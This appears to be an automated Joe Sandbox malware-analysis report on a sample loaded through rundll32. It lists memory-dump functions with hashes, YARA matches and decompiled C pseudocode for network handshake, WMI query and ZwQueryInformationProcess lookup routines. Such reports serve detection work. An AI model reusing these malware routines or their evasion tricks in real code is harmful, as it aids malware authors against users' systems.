                                        • Opcode ID: 373d0aa5d4f50cb0df9997d0a00ce80c1150626dcc1f719d6cc4b1729f3f4d55
                                        • Instruction ID: 69dcc974325fa366352419328c2d5d1a231acc0da06b56beb2fc55f7b9496cf0
                                        • Opcode Fuzzy Hash: 373d0aa5d4f50cb0df9997d0a00ce80c1150626dcc1f719d6cc4b1729f3f4d55
                                        • Instruction Fuzzy Hash: 48418F32305AC551EE399B05BC087EBA7A4F7A8B84F4640229E8A87F85DE7CC547C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304D884 Relevance: 7.6, APIs: 6, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 1931b78b82c2b0e54143dbc2a54af92af03a8e0969eaf2cdd513bb1de8eef630
                                        • Instruction ID: 29c06c9edfa03bd362e61705e0405a170bb4ebb2f0f8004de7af68113aa36cab
                                        • Opcode Fuzzy Hash: 1931b78b82c2b0e54143dbc2a54af92af03a8e0969eaf2cdd513bb1de8eef630
                                        • Instruction Fuzzy Hash: C741963120068141FF209B66DC587EB66D5F7A5B94F46822A9E5946FD6DA3CCE43C310
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3135138 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_statfp
                                        • String ID:
                                        • API String ID: 1156100317-0
                                        • Opcode ID: 5b1db35181187496796844778d53a522521f3efe2ad519d1bc34747997f719b6
                                        • Instruction ID: d2bae055d34248bb1f9166dd2ffb329f1d4fdb459497fc57cdc72b5bf36b769c
                                        • Opcode Fuzzy Hash: 5b1db35181187496796844778d53a522521f3efe2ad519d1bc34747997f719b6
                                        • Instruction Fuzzy Hash: 5711C232750B0105FE681128EC4E3FBF0F16B74BB0F5B4628AF6706ED68A5C8847D240
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEEEC0 Relevance: 7.5, APIs: 5, Instructions: 34synchronizationthreadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                                        • String ID:
                                        • API String ID: 3892215915-0
                                        • Opcode ID: c6531bed6f963c5cd30070fcdf949bee20af488ac0472414f382169d03fd255f
                                        • Instruction ID: 5b1b66d6d96e00eb817c419faa95508309bce8fc9fac1ac5701bbc3ba21af9ee
                                        • Opcode Fuzzy Hash: c6531bed6f963c5cd30070fcdf949bee20af488ac0472414f382169d03fd255f
                                        • Instruction Fuzzy Hash: 94018836211E41C2EF10CB39EC5815A73B0F799F68F468111CD5D4BAA4EF38C096C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF5850 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 23%
                                        			E0000021E21EF2FF5850(void* __ebx, void* __ecx, void* __edx, signed int __edi, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, signed int _a24, void* _a32) {
				void* _v8;
				char _v96;
				char _v168;
				char _v408;
				char _v512;
				char _v520;
				char _v560;
				char _v584;
				char _v608;
				char _v640;
				char _v664;
				char _v680;
				char _v696;
				long long _v704;
				long long _v712;
				long long _v720;
				long long _v736;
				intOrPtr _v744;
				char _v760;
				char _v784;
				long long _v792;
				char _v800;
				long long _v808;
				long long _v816;
				long long _v824;
				long long _v832;
				char _v840;
				long long _v848;
				char _v856;
				void* __rdi;
				void* _t75;
				void* _t79;
				long long _t80;
				char _t92;
				void* _t105;
				signed int _t113;
				void* _t114;
				long long _t127;
				long long _t129;
				void* _t134;
				long long _t160;
				void* _t179;
				void* _t182;
				long long _t183;
				char* _t188;
				void* _t192;

				_t186 = __r8;
				_t182 = __rbp;
				_t180 = __rsi;
				_t165 = __rdx;
				_t105 = __ebx;
				_t127 = _t183;
				 *((long long*)(_t127 - 0x2d8)) = 0xfffffffe;
				 *((long long*)(_t127 + 8)) = __rbx;
				 *((long long*)(_t127 + 0x10)) = __rsi;
				_t179 = __rdx;
				_t134 = __rcx;
				sil = 1;
				E0000021E21EF2FEFE70(__edx, _t127, __rcx,  &_v784, __r8);
				_t75 = E0000021E21EF2FF50D0(__edx, _t134,  &_v640);
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x80], xmm0");
				E0000021E21EF3001C60(_t75,  &_v760, _t165, _t186, _t192);
				E0000021E21EF2FEE9E0(_t134, _v784,  &_v760, E0000021E21EF3001C90,  &_v784);
				_v808 = _t127;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x58], xmm0");
				r8d = _a24 & 0x000000ff;
				E0000021E21EF2FF9B20(__edi, _t134,  &_v800);
				_t188 =  &_v640;
				_t79 = E0000021E21EF2FF9C30(_t105, _t127,  &_v520,  &_v784, _t182, _t188);
				if ( *((long long*)(_t134 + 0x18)) - 0x10 < 0) goto 0xf2ff5912;
				goto 0xf2ff5915;
				r8d = 0;
				_t17 = _t188 + 0x37; // 0x37
				E0000021E21EF30DD4D0();
				if (_t79 != 0) goto 0xf2ff5979;
				_t80 = E0000021E21EF3021AE0(_t127);
				E0000021E21EF2FF4EB0(_v408,  &_v784);
				_v824 = _t80;
				_v816 = _t127;
				asm("movaps xmm0, [esp+0x40]");
				asm("movdqa [esp+0xc0], xmm0");
				E0000021E21EF2FEE330(_t134,  &_v168,  &_v696);
				E0000021E21EF31103EC(_t134,  &_v168, 0xf31e4670, __rsi);
				E0000021E21EF2FF69D0( &_v664);
				_v720 =  &_v608;
				_t129 =  &_v584;
				_v712 = _t129;
				E0000021E21EF2FF66C0(_t129,  &_v608);
				_t135 = _t129;
				E0000021E21EF2FF6700(_t129,  &_v664,  &_v584, _t180);
				E0000021E21EF2FF9CF0(__edi, _t129,  &_v560,  &_v512, _t129, _t129);
				0xf2ff2b00();
				_v840 = 0;
				E0000021E21EF310D880( &_v560,  &_v512);
				_v832 = _t129;
				_a24 = 0;
				E0000021E21EF2FFA5F0(_t17, __edi, _t114, _t129, _t135,  &_v512,  &_v408, _t179, _t180,  &_a24,  &_v840);
				if (_v840 == 0) goto 0xf2ff5a4b;
				0xf2fee680();
				_v856 = 0;
				E0000021E21EF310D880( &_v840, "handshake");
				_v848 = _t129;
				E0000021E21EF2FFA380(_t17, __edi, _t114, _v840, _t129, _t135,  &_v512,  &_v408, _t179, _t180,  &_a24,  &_v856);
				0xf2fee810();
				_v704 = _t129;
				_v744 = 2;
				_v736 = _t129;
				asm("movaps xmm0, [esp+0x90]");
				asm("movdqa [esp+0x160], xmm0");
				_t92 = _v856;
				if (_v848 != _t129) goto 0xf2ff5ab4;
				if (_t92 == 2) goto 0xf2ff5af0;
				if (_t92 == 0) goto 0xf2ff5af0;
				asm("movaps xmm0, [esp+0x20]");
				asm("movdqa [esp+0xd0], xmm0");
				E0000021E21EF2FEE330(_t135,  &_v96,  &_v680);
				E0000021E21EF31103EC(_t135,  &_v96, 0xf31e4670, _t180);
				E0000021E21EF2FF5BD0(__edi, _t135,  &_v664);
				E0000021E21EF2FF5710(_t92, _t135,  &_v408, _t180,  &_v856);
				_v824 =  &_v512;
				E0000021E21EF2FF8910(__edi, _t135,  &_v512);
				E0000021E21EF2FF6E60(__edi, _t135,  &_v800,  &_a24);
				_t160 = _v792;
				_t113 = __edi | 0xffffffff;
				if (_t160 == 0) goto 0xf2ff5b7e;
				_a32 = _t160;
				asm("lock xadd [ecx+0x8], eax");
				if (_t113 != 1) goto 0xf2ff5b7e;
				 *((intOrPtr*)( *_a32))();
				asm("lock xadd [ebx+0xc], eax");
				if (_t113 != 1) goto 0xf2ff5b7e;
				 *((intOrPtr*)( *_a32 + 8))();
				E0000021E21EF2FF51A0(_t113,  *_a32, _a32,  &_v640);
				asm("lock xadd [0x215a9c], edi");
				if (_t113 != 1) goto 0xf2ff5ba0;
				__imp__#116();
				0xf2feed90();
				return sil & 0xffffffff;
			}

















































                                        0x21ef2ff5850
                                        0x21ef2ff5850
                                        0x21ef2ff5850
                                        0x21ef2ff5850
                                        0x21ef2ff5850
                                        0x21ef2ff5850
                                        0x21ef2ff585b
                                        0x21ef2ff5866
                                        0x21ef2ff586a
                                        0x21ef2ff586e
                                        0x21ef2ff5871
                                        0x21ef2ff5874
                                        0x21ef2ff587c
                                        0x21ef2ff588a
                                        0x21ef2ff5890
                                        0x21ef2ff5893
                                        0x21ef2ff58a6
                                        0x21ef2ff58c4
                                        0x21ef2ff58c9
                                        0x21ef2ff58ce
                                        0x21ef2ff58d1
                                        0x21ef2ff58d7
                                        0x21ef2ff58e5
                                        0x21ef2ff58eb
                                        0x21ef2ff5900
                                        0x21ef2ff590b
                                        0x21ef2ff5910
                                        0x21ef2ff5915
                                        0x21ef2ff5918
                                        0x21ef2ff5924
                                        0x21ef2ff592b
                                        0x21ef2ff592d
                                        0x21ef2ff5934
                                        0x21ef2ff5939
                                        0x21ef2ff593d
                                        0x21ef2ff5942
                                        0x21ef2ff5947
                                        0x21ef2ff5960
                                        0x21ef2ff5974
                                        0x21ef2ff5987
                                        0x21ef2ff5995
                                        0x21ef2ff599d
                                        0x21ef2ff59a5
                                        0x21ef2ff59b5
                                        0x21ef2ff59ba
                                        0x21ef2ff59cd
                                        0x21ef2ff59e9
                                        0x21ef2ff59f6
                                        0x21ef2ff59fd
                                        0x21ef2ff5a01
                                        0x21ef2ff5a06
                                        0x21ef2ff5a0b
                                        0x21ef2ff5a2f
                                        0x21ef2ff5a38
                                        0x21ef2ff5a46
                                        0x21ef2ff5a4b
                                        0x21ef2ff5a4f
                                        0x21ef2ff5a54
                                        0x21ef2ff5a6e
                                        0x21ef2ff5a73
                                        0x21ef2ff5a78
                                        0x21ef2ff5a80
                                        0x21ef2ff5a8b
                                        0x21ef2ff5a93
                                        0x21ef2ff5a9b
                                        0x21ef2ff5aa9
                                        0x21ef2ff5aad
                                        0x21ef2ff5ab2
                                        0x21ef2ff5ab6
                                        0x21ef2ff5ab8
                                        0x21ef2ff5abd
                                        0x21ef2ff5ad6
                                        0x21ef2ff5aea
                                        0x21ef2ff5af8
                                        0x21ef2ff5b06
                                        0x21ef2ff5b14
                                        0x21ef2ff5b21
                                        0x21ef2ff5b2c
                                        0x21ef2ff5b32
                                        0x21ef2ff5b37
                                        0x21ef2ff5b3d
                                        0x21ef2ff5b3f
                                        0x21ef2ff5b49
                                        0x21ef2ff5b51
                                        0x21ef2ff5b61
                                        0x21ef2ff5b65
                                        0x21ef2ff5b6d
                                        0x21ef2ff5b7a
                                        0x21ef2ff5b86
                                        0x21ef2ff5b8c
                                        0x21ef2ff5b97
                                        0x21ef2ff5b99
                                        0x21ef2ff5ba5
                                        0x21ef2ff5bcd

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: handshake
                                        • API String ID: 1678628239-3879415452
                                        • Opcode ID: 37d834908d4b2458d41a416d311abbe7045e5990e4d65ff35c772aaecf1df110
                                        • Instruction ID: d5e515954313fef666f8b12a4c37e081b226cdabffa4bb2595664e7339667486
                                        • Opcode Fuzzy Hash: 37d834908d4b2458d41a416d311abbe7045e5990e4d65ff35c772aaecf1df110
                                        • Instruction Fuzzy Hash: 6F916373118AC691DE709B24E8853DEA364F7E5750F414212EE8D53EA9EF78C586CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301AA34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: ZwQueryInformationProcess$ntdll.dll
                                        • API String ID: 1646373207-132032222
                                        • Opcode ID: 79f0206e3732600b83d501743db93a9b2054c95e8027ec3ff63a98278aaf4209
                                        • Instruction ID: 33b13c0dc42164a81a801910780af0e3c493595f854531dceb75c94c6a5b04bd
                                        • Opcode Fuzzy Hash: 79f0206e3732600b83d501743db93a9b2054c95e8027ec3ff63a98278aaf4209
                                        • Instruction Fuzzy Hash: 0E516931311B4082FF25DB2AE8147DB67A4FBA8B84F464426AE4D57B9ADF3CC646C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301D7D3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF301D7D3(signed int __ecx, void* __esi, char* __rbx, intOrPtr* __rsi, void* __r9, void* __r12, long long __r13) {
				void* _t118;
				void* _t119;
				void* _t125;
				void* _t128;
				intOrPtr _t176;
				intOrPtr _t178;
				long long* _t179;
				long long* _t180;
				char* _t190;
				intOrPtr* _t192;
				intOrPtr _t194;
				void* _t195;
				intOrPtr* _t199;
				intOrPtr _t200;
				intOrPtr* _t210;
				intOrPtr* _t212;
				intOrPtr* _t228;
				void* _t239;
				short* _t240;
				intOrPtr* _t245;
				intOrPtr* _t246;
				long long* _t257;
				void* _t259;

				_t190 = __rbx;
				_t192 =  *((intOrPtr*)(_t259 + 0x60));
				if (_t192 == 0) goto 0xf301d7e3;
				 *((intOrPtr*)( *_t192 + 0x10))();
				 *((long long*)(__rbx + 0x18)) = 0xf;
				 *((long long*)(__rbx + 0x10)) = __r13;
				 *__rbx = 0;
				0xf2fe6770();
				 *((intOrPtr*)(_t259 + 0x50)) = 1;
				_t176 =  *((intOrPtr*)(_t257 - 0x78));
				if (_t176 - 0x10 < 0) goto 0xf301d76f;
				_t194 =  *((intOrPtr*)(_t259 + 0x70));
				if (_t176 + 1 - 0x1000 < 0) goto 0xf301d76a;
				if ((__ecx & 0x0000001f) == 0) goto 0xf301d834;
				0xf3111be8();
				asm("int3");
				_t178 =  *((intOrPtr*)(_t194 - 8));
				if (_t178 - _t194 < 0) goto 0xf301d843;
				0xf3111be8();
				asm("int3");
				_t195 = _t194 - _t178;
				if (_t195 - 8 >= 0) goto 0xf301d852;
				0xf3111be8();
				asm("int3");
				if (_t195 - 0x27 <= 0) goto 0xf301d767;
				0xf3111be8();
				_t179 =  *0xf320b520;
				if (_t179 != 0) goto 0xf301d892;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *0xf320b520 = _t179;
				 *((intOrPtr*)(_t259 + 0x38)) = r13d;
				 *((long long*)(_t259 + 0x30)) = __r13;
				 *((intOrPtr*)(_t259 + 0x28)) = 3;
				 *((intOrPtr*)(_t259 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				if ( *_t179() >= 0) goto 0xf301d8db;
				_t199 =  *((intOrPtr*)(_t259 + 0x60));
				if (_t199 == 0) goto 0xf301d8d1;
				_t180 =  *_t199;
				 *((intOrPtr*)(_t180 + 0x10))();
				_t200 =  *((intOrPtr*)(_t259 + 0x58));
				goto 0xf301dbed;
				 *((long long*)(_t259 + 0x68)) = __r13;
				if ( *((long long*)(__rsi + 0x18)) - 0x10 < 0) goto 0xf301d8ea;
				_t252 =  *__rsi;
				E0000021E21EF310B674(_t180, _t200);
				 *((long long*)(_t257 + 0xa8)) = _t180;
				if (_t180 == 0) goto 0xf301d91b;
				 *((long long*)(_t180 + 8)) = __r13;
				 *((intOrPtr*)(_t180 + 0x10)) = 1;
				_t201 =  *__rsi;
				E0000021E21EF310D920(_t128, __rbx,  *__rsi,  *__rsi);
				 *_t180 = _t180;
				goto 0xf301d91e;
				 *((long long*)(_t257 + 8)) = __r13;
				if (__r13 != 0) goto 0xf301d932;
				E0000021E21EF310D8F0();
				E0000021E21EF310B674(_t180, _t201);
				 *((long long*)(_t257 + 0xa8)) = _t180;
				if (_t180 == 0) goto 0xf301d967;
				 *((long long*)(_t180 + 8)) = __r13;
				 *((intOrPtr*)(_t180 + 0x10)) = 1;
				E0000021E21EF310D920(_t128, _t190, "WQL", _t252);
				 *_t180 = _t180;
				goto 0xf301d96a;
				 *_t257 = __r13;
				if (__r13 != 0) goto 0xf301d97e;
				E0000021E21EF310D8F0();
				 *((long long*)(_t259 + 0x28)) = _t259 + 0x68;
				 *((long long*)(_t259 + 0x20)) = __r13;
				r9d = 0x30;
				r15d =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t259 + 0x58)))) + 0xa0))();
				asm("lock inc ecx");
				if (__esi != 1) goto 0xf301d9eb;
				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301d9cc;
				__imp__#6();
				 *((long long*)(__r13)) = __r13;
				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301d9de;
				0xf310bdc8();
				 *((long long*)(__r13 + 8)) = __r13;
				0xf310bdc8();
				 *_t257 = __r13;
				asm("lock xadd [edi+0x10], eax");
				if (__esi != 1) goto 0xf301da2b;
				if ( *((intOrPtr*)(__r13)) == 0) goto 0xf301da0c;
				__imp__#6();
				 *((long long*)(__r13)) = __r13;
				if ( *((intOrPtr*)(__r13 + 8)) == 0) goto 0xf301da1e;
				0xf310bdc8();
				 *((long long*)(__r13 + 8)) = __r13;
				0xf310bdc8();
				 *((long long*)(_t257 + 8)) = __r13;
				if (r15d >= 0) goto 0xf301da4e;
				_t210 =  *((intOrPtr*)(_t259 + 0x58));
				if (_t210 == 0) goto 0xf301da44;
				 *((intOrPtr*)( *_t210 + 0x10))();
				goto 0xf301dbed;
				_t212 =  *((intOrPtr*)(_t259 + 0x68));
				if (_t212 == 0) goto 0xf301dbbd;
				 *((long long*)(_t257 - 0x70)) = __r13;
				 *((intOrPtr*)(_t257 + 0xa8)) = r13d;
				 *((long long*)(_t259 + 0x20)) = _t257 + 0xa8;
				r8d = 1;
				 *((intOrPtr*)( *_t212 + 0x20))();
				if ( *((intOrPtr*)(_t257 + 0xa8)) == 0) goto 0xf301dbb8;
				__imp__#8();
				if ( *((long long*)(_t257 - 0x70)) == 0) goto 0xf301dbb8;
				0xf3018a7c();
				_t239 =  >=  ?  *((void*)(_t257 - 0x28)) : _t257 - 0x28;
				_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70))));
				 *((long long*)(_t259 + 0x28)) = __r13;
				 *((long long*)(_t259 + 0x20)) = __r13;
				r8d = 0;
				_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70)))) + 0x20))();
				_t240 =  *((intOrPtr*)(_t257 + 0x18));
				if (_t240 == 0) goto 0xf301db78;
				 *((long long*)(_t257 - 0x38)) = __r13;
				 *((long long*)(_t257 - 0x30)) = __r13;
				 *((long long*)(_t257 - 0x30)) = 7;
				 *((long long*)(_t257 - 0x38)) = __r13;
				 *((intOrPtr*)(_t257 - 0x48)) = r13w;
				if ( *_t240 != 0) goto 0xf301db10;
				goto 0xf301db1a;
				if ( *((short*)(_t240 + (__r13 + 1) * 2)) != 0) goto 0xf301db10;
				_t119 = E0000021E21EF2FE8020(_t118, __esi, _t184, _t190, _t257 - 0x48, _t240, __r13, __r13 + 1, __r13 + 1);
				0xf3018bcc();
				E0000021E21EF2FE6100(E0000021E21EF2FE7EF0(_t119, __esi, _t190, _t259 + 0x70, _t184), __esi, _t257 + 0x30);
				if ( *((intOrPtr*)(_t257 - 0x30)) - 8 < 0) goto 0xf301db67;
				0xf2fe8550();
				 *((long long*)(_t257 - 0x30)) = 7;
				 *((long long*)(_t257 - 0x38)) = __r13;
				 *((intOrPtr*)(_t257 - 0x48)) = r13w;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t257 - 0x70)))) + 0x10))();
				if ( *((intOrPtr*)(_t257 - 0x10)) - 8 < 0) goto 0xf301dba7;
				0xf2fe8550();
				 *((long long*)(_t257 - 0x10)) = 7;
				 *((long long*)(_t257 - 0x18)) = __r13;
				 *((intOrPtr*)(_t257 - 0x28)) = r13w;
				_t245 =  *((intOrPtr*)(_t259 + 0x58));
				if (_t245 == 0) goto 0xf301dbd5;
				 *((intOrPtr*)( *_t245 + 0x10))();
				_t246 =  *((intOrPtr*)(_t259 + 0x60));
				if (_t246 == 0) goto 0xf301dbed;
				 *((intOrPtr*)( *_t246 + 0x10))();
				_t228 =  *((intOrPtr*)(_t259 + 0x68));
				if (_t228 == 0) goto 0xf301dbf8;
				_t125 =  *((intOrPtr*)( *_t228 + 0x10))();
				 *((long long*)(_t190 + 0x18)) = 0xf;
				 *((long long*)(_t190 + 0x10)) = __r13;
				 *_t190 = 0;
				0xf2fe6770();
				 *((intOrPtr*)(_t259 + 0x50)) = 1;
				return E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t125, __esi, _t259 + 0x70), __esi, _t257 - 0x68);
			}


























                                        0x21ef301d7d3
                                        0x21ef301d7d3
                                        0x21ef301d7db
                                        0x21ef301d7e0
                                        0x21ef301d7e3
                                        0x21ef301d7eb
                                        0x21ef301d7ef
                                        0x21ef301d7fa
                                        0x21ef301d7ff
                                        0x21ef301d807
                                        0x21ef301d80f
                                        0x21ef301d818
                                        0x21ef301d823
                                        0x21ef301d82c
                                        0x21ef301d82e
                                        0x21ef301d833
                                        0x21ef301d834
                                        0x21ef301d83b
                                        0x21ef301d83d
                                        0x21ef301d842
                                        0x21ef301d843
                                        0x21ef301d84a
                                        0x21ef301d84c
                                        0x21ef301d851
                                        0x21ef301d856
                                        0x21ef301d85c
                                        0x21ef301d862
                                        0x21ef301d86c
                                        0x21ef301d875
                                        0x21ef301d885
                                        0x21ef301d88b
                                        0x21ef301d892
                                        0x21ef301d897
                                        0x21ef301d89c
                                        0x21ef301d8a4
                                        0x21ef301d8ac
                                        0x21ef301d8af
                                        0x21ef301d8bf
                                        0x21ef301d8c1
                                        0x21ef301d8c9
                                        0x21ef301d8cb
                                        0x21ef301d8ce
                                        0x21ef301d8d1
                                        0x21ef301d8d6
                                        0x21ef301d8db
                                        0x21ef301d8e5
                                        0x21ef301d8e7
                                        0x21ef301d8ef
                                        0x21ef301d8f7
                                        0x21ef301d901
                                        0x21ef301d903
                                        0x21ef301d907
                                        0x21ef301d90e
                                        0x21ef301d911
                                        0x21ef301d916
                                        0x21ef301d919
                                        0x21ef301d91e
                                        0x21ef301d925
                                        0x21ef301d92c
                                        0x21ef301d937
                                        0x21ef301d93f
                                        0x21ef301d949
                                        0x21ef301d94b
                                        0x21ef301d94f
                                        0x21ef301d95d
                                        0x21ef301d962
                                        0x21ef301d965
                                        0x21ef301d96a
                                        0x21ef301d971
                                        0x21ef301d978
                                        0x21ef301d98b
                                        0x21ef301d990
                                        0x21ef301d995
                                        0x21ef301d9a7
                                        0x21ef301d9b0
                                        0x21ef301d9b9
                                        0x21ef301d9c1
                                        0x21ef301d9c3
                                        0x21ef301d9c9
                                        0x21ef301d9d3
                                        0x21ef301d9d5
                                        0x21ef301d9da
                                        0x21ef301d9e6
                                        0x21ef301d9eb
                                        0x21ef301d9f1
                                        0x21ef301d9f9
                                        0x21ef301da01
                                        0x21ef301da03
                                        0x21ef301da09
                                        0x21ef301da13
                                        0x21ef301da15
                                        0x21ef301da1a
                                        0x21ef301da26
                                        0x21ef301da2b
                                        0x21ef301da32
                                        0x21ef301da34
                                        0x21ef301da3c
                                        0x21ef301da41
                                        0x21ef301da49
                                        0x21ef301da4e
                                        0x21ef301da56
                                        0x21ef301da5c
                                        0x21ef301da60
                                        0x21ef301da71
                                        0x21ef301da7a
                                        0x21ef301da82
                                        0x21ef301da8c
                                        0x21ef301da96
                                        0x21ef301daa1
                                        0x21ef301daae
                                        0x21ef301dabd
                                        0x21ef301dac6
                                        0x21ef301dac9
                                        0x21ef301dace
                                        0x21ef301dad7
                                        0x21ef301dada
                                        0x21ef301dadd
                                        0x21ef301dae4
                                        0x21ef301daea
                                        0x21ef301daee
                                        0x21ef301daf2
                                        0x21ef301dafa
                                        0x21ef301dafe
                                        0x21ef301db07
                                        0x21ef301db0c
                                        0x21ef301db18
                                        0x21ef301db21
                                        0x21ef301db2f
                                        0x21ef301db47
                                        0x21ef301db55
                                        0x21ef301db62
                                        0x21ef301db67
                                        0x21ef301db6f
                                        0x21ef301db73
                                        0x21ef301db7c
                                        0x21ef301db89
                                        0x21ef301db95
                                        0x21ef301dba2
                                        0x21ef301dba7
                                        0x21ef301dbaf
                                        0x21ef301dbb3
                                        0x21ef301dbbd
                                        0x21ef301dbc5
                                        0x21ef301dbcd
                                        0x21ef301dbd5
                                        0x21ef301dbdd
                                        0x21ef301dbe5
                                        0x21ef301dbe8
                                        0x21ef301dbf0
                                        0x21ef301dbf5
                                        0x21ef301dbf8
                                        0x21ef301dc00
                                        0x21ef301dc04
                                        0x21ef301dc0f
                                        0x21ef301dc14
                                        0x21ef301dc4d

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: CoSetProxyBlanket$ole32.dll
                                        • API String ID: 1646373207-1829017490
                                        • Opcode ID: d5e14ee62550cef7167e82891b4772f914846d14be73bf144f6102d1eed61d9e
                                        • Instruction ID: 83c3284b2a811edc9020e3677279d26f207e559a8ab33bb0159b5ff60e9e0d49
                                        • Opcode Fuzzy Hash: d5e14ee62550cef7167e82891b4772f914846d14be73bf144f6102d1eed61d9e
                                        • Instruction Fuzzy Hash: 3E412936605B4486FF05AB64E8583EF67A1F7A4B48F110416DE4A07FA6DFBCC48AC750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FFA220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E0000021E21EF2FFA220(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, long long __r14) {
				void* _t41;
				void* _t44;
				long long _t47;
				void* _t75;
				void* _t77;
				long long _t78;
				void* _t79;

				_t47 = _t78;
				_t77 = _t47 - 0x118;
				_t79 = _t78 - 0x210;
				 *((long long*)(_t77 - 0x78)) = 0xfffffffe;
				 *((long long*)(_t47 + 8)) = __rbx;
				 *((long long*)(_t47 + 0x10)) = __rsi;
				 *((long long*)(_t47 + 0x18)) = __rdi;
				 *((long long*)(_t47 + 0x20)) = __r14;
				asm("movaps [eax-0x18], xmm6");
				_t53 = __r8;
				_t75 = __rcx;
				r14d = 0;
				 *((intOrPtr*)(_t79 + 0x20)) = r14d;
				E0000021E21EF310D880(__rcx, __rdx);
				 *((long long*)(_t79 + 0x28)) = _t47;
				0xf2ffedf0();
				if ( *((intOrPtr*)(_t79 + 0x20)) == r14d) goto 0xf2ffa356;
				asm("movaps xmm6, [esp+0x20]");
				 *((long long*)(_t79 + 0x40)) = 0xf319d200;
				 *((long long*)(_t79 + 0x48)) = 0xf319d200;
				 *((long long*)(_t79 + 0x50)) = 0xf319d200;
				 *((long long*)(_t79 + 0x30)) = 0xf31b1da2;
				 *((char*)(_t79 + 0x38)) = 1;
				E0000021E21EF310E0E4(__r8, _t79 + 0x30, _t79 + 0x48, __rdx, _t75);
				 *((long long*)(_t79 + 0x40)) = 0xf319d2a0;
				 *((long long*)(_t79 + 0x40)) = 0xf31b1bc8;
				asm("movups [esp+0x58], xmm6");
				 *((long long*)(_t79 + 0x78)) = __r14;
				 *((long long*)(_t77 - 0x80)) = __r14;
				 *((long long*)(_t77 - 0x80)) = 0xf;
				 *((long long*)(_t79 + 0x78)) = __r14;
				 *((intOrPtr*)(_t79 + 0x68)) = r14b;
				_t41 = E0000021E21EF2FFDF30(0xf31b1bc8, _t53, _t77 + 0x18);
